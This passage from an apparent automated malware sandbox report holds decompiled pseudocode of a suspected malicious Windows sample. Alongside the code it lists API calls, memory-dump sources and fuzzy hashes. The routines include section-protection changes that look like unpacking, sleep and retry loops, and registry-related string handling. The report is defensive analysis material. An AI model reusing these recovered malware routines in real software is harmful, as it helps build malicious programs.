				_t54 = _v8;
				if(_v8 != 0) {
					E047E7220(_t54);
				}
				return _t45;
			}

0x047e5251
0x047e5261
0x047e5264
0x047e526b
0x047e526d
0x047e526d
0x047e5270
0x047e5275
0x047e527c
0x047e5289
0x047e528e
0x047e5292
0x047e52a0
0x047e52ae
0x047e52b2
0x047e5343
0x047e5343
0x047e52b8
0x047e52b8
0x047e52bd
0x047e52bd
0x047e52c4
0x047e52d0
0x047e52d2
0x047e52d4
0x047e52d6
0x047e52dd
0x047e52e8
0x047e52ef
0x047e52f1
0x047e52f8
0x047e52fa
0x047e5301
0x047e530c
0x047e530c
0x047e52f8
0x047e5311
0x047e5316
0x047e531d
0x047e533b
0x047e533d
0x047e533d
0x047e52d4
0x047e534f
0x047e534f
0x047e5351
0x047e5356
0x047e5358
0x047e5358
0x047e5363

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05429218,00000000,?,746AF710,00000000,746AF730), ref: 047E52A0
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05429160,?,00000000,30314549,00000014,004F0053,05429270), ref: 047E533D
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,047E68B6), ref: 047E534F

Strings

Uet, xrefs: 047E52A6

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: FreeHeap
String ID: Uet
API String ID: 3298025750-2766386878
Opcode ID: d9ddf9fc3ba58ee7f60fd0b778e31a542c26b4f1e3fc0347da9899796fe9a04d
Instruction ID: 0abd724fa61973c6f1eaa5f6bd5039c6d7fd1f4da2e17d3a1848baf1387bde48
Opcode Fuzzy Hash: d9ddf9fc3ba58ee7f60fd0b778e31a542c26b4f1e3fc0347da9899796fe9a04d
Instruction Fuzzy Hash: BC318C3290020DFFDB11DBD7DD88EEA3BBCEB4C708F444265A501AB221DA75AE48DB50

Uniqueness

Uniqueness Score: -1.00%

Function 047E4358 Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 047E43B5
SysAllocString.OLEAUT32(047E4D42), ref: 047E43F9
SysFreeString.OLEAUT32(00000000), ref: 047E440D
SysFreeString.OLEAUT32(00000000), ref: 047E441B

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 834127b9cd27aef42f022232012f7463f3153c082bb72b717154e3da6cc67047
Instruction ID: fd6fa0ca2264e12e1be2eac51ea98179a33784d3bbd1d02743bd6fec88de49e5
Opcode Fuzzy Hash: 834127b9cd27aef42f022232012f7463f3153c082bb72b717154e3da6cc67047
Instruction Fuzzy Hash: EE310EB6A00209AFCB05DF99D8849EE7BB5FF4D304B10852AF5069B250D734AA41CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 047E213E Relevance: 6.0, APIs: 4, Instructions: 44
sleepthreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E047E213E(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t17;
				signed int _t18;
				unsigned int _t22;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t22 = _v12.dwHighDateTime;
					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t22 >> 5);
					_push(_t16);
					L047E8436();
					_t34 = _t16 + _t13;
					_t17 = E047E6269(_a4, _t34);
					_t30 = _t17;
					_t18 = 3;
					Sleep(_t18 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}

0x047e2143
0x047e214e
0x047e214f
0x047e214f
0x047e215b
0x047e2164
0x047e2167
0x047e216b
0x047e216d
0x047e2172
0x047e2173
0x047e2174
0x047e217e
0x047e2181
0x047e2188
0x047e218c
0x047e2193
0x047e2199
0x047e21a3

APIs

SwitchToThread.KERNEL32(?,00000001,?,?,?,047E5044,?,?), ref: 047E214F
GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,047E5044,?,?), ref: 047E215B
_aullrem.NTDLL(00000000,?,00000013,00000000), ref: 047E2174

Part of subcall function 047E6269: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 047E6308

Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,047E5044,?,?), ref: 047E2193

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
String ID:
API String ID: 1610602887-0
Opcode ID: 68e6c456af700746fc3f44ea5066eeb64d1cca8ac4035abda2fa8782fe482edf
Instruction ID: 2f0e7e401855688c482a3f4bc8a8097983f425965d8e1cdd9413793603a85a19
Opcode Fuzzy Hash: 68e6c456af700746fc3f44ea5066eeb64d1cca8ac4035abda2fa8782fe482edf
Instruction Fuzzy Hash: 49F0A4B7B402047BD7149AA5CC1DBEF77BDDB88361F510624E601E7340E5B8AA018690

Uniqueness

Uniqueness Score: -1.00%

Function 047E5157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E047E5157(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				short _t19;
				void* _t21;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E047E6536(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0;
					_t22 = E047E330E(__ecx, _a4, _a8, _t25);
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t21 = E047E7767(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8); // executed
						_t22 = _t21;
					}
					HeapFree( *0x47ea2d8, 0, _t25);
				}
				return _t22;
			}

0x047e5157
0x047e5168
0x047e516c
0x047e51c7
0x047e516e
0x047e5175
0x047e517d
0x047e5185
0x047e5189
0x047e518f
0x047e5197
0x047e519a
0x047e51ad
0x047e51b2
0x047e51b2
0x047e51bd
0x047e51bd
0x047e51ce

APIs

Part of subcall function 047E6536: lstrlen.KERNEL32(?,00000000,05429E00,00000000,047E6F0A,0542A023,43175AC3,?,?,?,?,43175AC3,00000005,047EA00C,4D283A53,?), ref: 047E653D
Part of subcall function 047E6536: mbstowcs.NTDLL ref: 047E6566
Part of subcall function 047E6536: memset.NTDLL ref: 047E6578

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74655520,00000008,00000014,004F0053,05429270), ref: 047E518F
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74655520,00000008,00000014,004F0053,05429270), ref: 047E51BD

Strings

Uet, xrefs: 047E51BD

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID: Uet
API String ID: 1500278894-2766386878
Opcode ID: 9ab8b67d634ed911c1a332a216aaa4feed70b1e122a6fd3d77c34e3722bbcb15
Instruction ID: d8022a2efec36dad9e9a49b343291ad9f1a186b46458d2852de406f7fb5c52fe
Opcode Fuzzy Hash: 9ab8b67d634ed911c1a332a216aaa4feed70b1e122a6fd3d77c34e3722bbcb15
Instruction Fuzzy Hash: C3018472200209BBDB215F96DC44EEA3F79EF88718F404626FA009A251EA72E954D750

Uniqueness

Uniqueness Score: -1.00%

Function 004014CF Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004014CF(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t42;
				long _t53;
				intOrPtr _t56;
				void* _t57;
				signed int _t59;

				_v12 = _v12 & 0x00000000;
				_t56 =  *0x404180;
				_t57 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t56 - 0x43175abf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t59 = _v12;
					if(_t59 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t59 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t53 = _t56 - 0x43175abf;
							L9:
							_t42 = VirtualProtect( *((intOrPtr*)(_t57 + 0xc)) + _a4,  *(_t57 + 8), _t53,  &_v20); // executed
							if(_t42 == 0) {
								_v12 = GetLastError();
							}
							_t57 = _t57 + (_t56 - 0x3175ac2) * 0x28;
							_v8 = _v8 + 1;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t53 = _t56 - 0x43175ac1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t59 >= 0) {
						_t53 = _t56 - 0x43175aa3;
					} else {
						_t53 = _t56 - 0x43175a83;
					}
					goto L9;
				}
				goto L12;
			}

0x004014d9
0x004014e6
0x004014ec
0x004014f8
0x00401508
0x0040150a
0x00401512
0x004015a6
0x004015ad
0x00000000
0x00000000
0x00000000
0x00401518
0x00401518
0x00401518
0x0040151c
0x00000000
0x00000000
0x00401528
0x0040152c
0x00401550
0x00401554
0x00401568
0x00401568
0x0040156e
0x0040157d
0x00401581
0x00401589
0x00401589
0x00401595
0x00401597
0x004015a0
0x00000000
0x00000000
0x00000000
0x00000000
0x004015a0
0x0040155c
0x00401560
0x00401566
0x00000000
0x00000000
0x00000000
0x00401566
0x00401534
0x00401538
0x00401542
0x0040153a
0x0040153a
0x0040153a
0x00000000
0x00401538
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
GetLastError.KERNEL32 ref: 00401583

Memory Dump Source

Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
Instruction ID: db8870d9979c58085381c8b0541bfb0d1fdb36fbc34c572f0fe0e58abbf4653c
Opcode Fuzzy Hash: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
Instruction Fuzzy Hash: D1212B7280121AEFCB14CF95C9819AAF7B4FF58305F04487AE413AB960E738AA55CF58

Uniqueness

Uniqueness Score: -1.00%

Function 047E12C6 Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E047E12C6(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E047E33DC(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x47e9278); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}

0x047e12ca
0x047e12d7
0x047e12d9
0x047e12da
0x047e12e2
0x047e12e2
0x047e12e6
0x00000000
0x00000000
0x047e12dd
0x047e12de
0x047e12e1
0x047e12e1
0x047e12ee
0x047e12f3
0x047e12f8
0x047e1300
0x047e1306
0x047e1308
0x047e130b
0x047e130f
0x047e1311
0x047e1314
0x047e1314
0x047e1315
0x047e1317
0x047e1314
0x047e1321
0x047e1324
0x047e1327
0x047e1328
0x047e132a
0x047e1331
0x047e1331
0x047e133d

APIs

StrChrA.SHLWAPI(?,00000020,00000000,054295FC,?,?,047E53AF,?,054295FC), ref: 047E12E2
StrTrimA.KERNELBASE(?,047E9278,00000002,?,047E53AF,?,054295FC), ref: 047E1300
StrChrA.SHLWAPI(?,00000020,?,047E53AF,?,054295FC), ref: 047E130B

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 6a0793ee2812c1c2b85f3f0efaa6c9025c4916969e58486c0d7a750bb1a082bc
Instruction ID: 145e1d3c7e8d5e50dd57069c19f46823ab21e7fcd617c2af1e696c12df2e89ab
Opcode Fuzzy Hash: 6a0793ee2812c1c2b85f3f0efaa6c9025c4916969e58486c0d7a750bb1a082bc
Instruction Fuzzy Hash: 8701B1713003466FE7104E6BCC4AFB77B9CEB8D340F844211A995CB382D670E841C660

Uniqueness

Uniqueness Score: -1.00%

Function 047E61DA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E047E61DA(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x47ea2d8, 0, _a4); // executed
				return _t2;
			}

0x047e61e6
0x047e61ec

APIs

RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6

Strings

Uet, xrefs: 047E61E6

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: FreeHeap
String ID: Uet
API String ID: 3298025750-2766386878
Opcode ID: febcc0e3e7c6f760b694d6ee42c09d3e97d5e5f21bc8773ac0d43006a47c0b7d
Instruction ID: 61f2a1c1a679aac7940f9cf50ca50bb640fecd5a2092f4f8f7594771aa9fc942
Opcode Fuzzy Hash: febcc0e3e7c6f760b694d6ee42c09d3e97d5e5f21bc8773ac0d43006a47c0b7d
Instruction Fuzzy Hash: A2B012F3200200EBCB114B03DF04F457B21E7D8700F00C610B3041807182360C20FB15

Uniqueness

Uniqueness Score: -1.00%

Function 00414780 Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 288memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B53FFC,0079A862,0040108C,?,00401014), ref: 00414876

Strings

t0@, xrefs: 00414888

Memory Dump Source

Source File: 00000000.00000002.523801722.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40f000_server.jbxd

Similarity

API ID: AllocLocal
String ID: t0@
API String ID: 3494564517-86208253
Opcode ID: a474110c101397cd18f60078a18c3dda39cdddade77e172d0c617e01277d085e
Instruction ID: be45306d5ca630943fb9e872924dde3a3a026e17281dafdd0bc2a0dc2c1a05f6
Opcode Fuzzy Hash: a474110c101397cd18f60078a18c3dda39cdddade77e172d0c617e01277d085e
Instruction Fuzzy Hash: 19A1A9717C4340BBF360ABA0DD47F9A77A4AB84B56F100426F7487E6D0C6B469848B6E

Uniqueness

Uniqueness Score: -1.00%

Function 047E790B Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E047E790B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E047E4358(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x47ea348; // 0xc3d5a8
						_t20 = _t68 + 0x47eb270; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E047E4984(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x047e7911
0x047e7914
0x047e7924
0x047e792d
0x047e7931
0x047e79ff
0x047e7a05
0x047e7a05
0x047e794b
0x047e7950
0x047e7954
0x047e795a
0x047e795f
0x047e7966
0x047e7975
0x047e7975
0x047e7979
0x047e797b
0x047e7987
0x047e7992
0x047e799d
0x047e79a1
0x047e79ab
0x047e79af
0x047e79b1
0x047e79b6
0x047e79bd
0x047e79cd
0x047e79cd
0x047e79b6
0x047e79af
0x047e79cf
0x047e79d4
0x047e79d9
0x047e79d9
0x047e79dc
0x047e79e5
0x047e79ea
0x047e79ea
0x047e79ef
0x047e79f4
0x047e79f4
0x047e79ef
0x047e7979
0x047e79f6
0x047e79fc
0x00000000

APIs

Part of subcall function 047E4358: SysAllocString.OLEAUT32(80000002), ref: 047E43B5
Part of subcall function 047E4358: SysFreeString.OLEAUT32(00000000), ref: 047E441B

SysFreeString.OLEAUT32(?), ref: 047E79EA
SysFreeString.OLEAUT32(047E4D42), ref: 047E79F4

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 7bbfe4d37e87d4b901522a6d554104c75856c8b2426a9f78d78d7749d282afb2
Instruction ID: 7964a95ab0625b0cd45657d4ccac1132515a328f105919b6fee602536744511b
Opcode Fuzzy Hash: 7bbfe4d37e87d4b901522a6d554104c75856c8b2426a9f78d78d7749d282afb2
Instruction Fuzzy Hash: F4313972500159AFCF15DF5AC888CABBB7AFFCD7407144658F9059B214D731AD91CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040139F Relevance: 3.1, APIs: 2, Instructions: 60
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040139F() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				void* _t24;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t35;
				intOrPtr _t38;

				_t15 =  *0x404184;
				if( *0x40416c > 5) {
					_t16 = _t15 + 0x40513c;
				} else {
					_t16 = _t15 + 0x40529c;
				}
				E00401D3C(_t16, _t16);
				_t35 = 6;
				memset( &_v32, 0, _t35 << 2);
				_t24 = E00401882( &_v32,  &_v16,  *0x404180 ^ 0xdd0210cf); // executed
				if(_t24 == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x404178);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E004015B0(_t38, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x404178 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							L00401FE6(_t32 + 4);
						}
					}
					_t25 = E004012FB(_v28); // executed
				}
				ExitThread(_t25);
			}

0x004013a5
0x004013b6
0x004013c0
0x004013b8
0x004013b8
0x004013b8
0x004013c7
0x004013d0
0x004013d5
0x004013ec
0x004013f3
0x00401450
0x004013f5
0x004013fb
0x00401401
0x0040140f
0x00401413
0x0040141a
0x00401422
0x00401426
0x0040142e
0x0040143f
0x00401430
0x00401436
0x00401436
0x0040142e
0x00401447
0x00401447
0x00401452

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 004013FB
ExitThread.KERNEL32 ref: 00401452

Memory Dump Source

Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
Instruction ID: 2b8b17c81bcefa181eed95ac27ced154ec6146dfe98fb58ff2424010aaaeeb75
Opcode Fuzzy Hash: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
Instruction Fuzzy Hash: A511E271504205ABE700EB61DD48E5B77ECAF84314F00493BB941F72B1EB38EA448B5A

Uniqueness

Uniqueness Score: -1.00%

Function 047E3284 Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 047E32AB

Part of subcall function 047E790B: SysFreeString.OLEAUT32(?), ref: 047E79EA

SafeArrayDestroy.OLEAUT32(?), ref: 047E32FB

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: ArraySafe$CreateDestroyFreeString
String ID:
API String ID: 3098518882-0
Opcode ID: fa63b107f1f63d4bbd4b1e82b19e84521316c31260260d579fdd1d3cb6b438d8
Instruction ID: aedbc8482a35b6c8b199c00469b9a9645429733752634d14d528484f418c11dd
Opcode Fuzzy Hash: fa63b107f1f63d4bbd4b1e82b19e84521316c31260260d579fdd1d3cb6b438d8
Instruction Fuzzy Hash: 0F11337590010ABFDB11DF95CC05DEEBBB9EF08714F008115EA05A7260E775AA159B91

Uniqueness

Uniqueness Score: -1.00%

Function 047E33F1 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E047E33F1(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E047E58BD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x47ea2d8, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E047E2839(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x047e33f1
0x047e33f9
0x047e3410
0x047e342b
0x047e342f
0x047e3434
0x047e3436
0x047e3448
0x047e3454
0x047e3438
0x047e3438
0x047e343d
0x047e3442
0x047e3442
0x047e3436
0x047e345a
0x047e345e
0x047e345e
0x047e3405
0x047e340a
0x047e340e
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 047E2839: SysFreeString.OLEAUT32(00000000), ref: 047E289C

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,746AF710,?,00000000,?,00000000,?,047E528E,?,004F0053,05429218,00000000,?), ref: 047E3454

Strings

Uet, xrefs: 047E3454

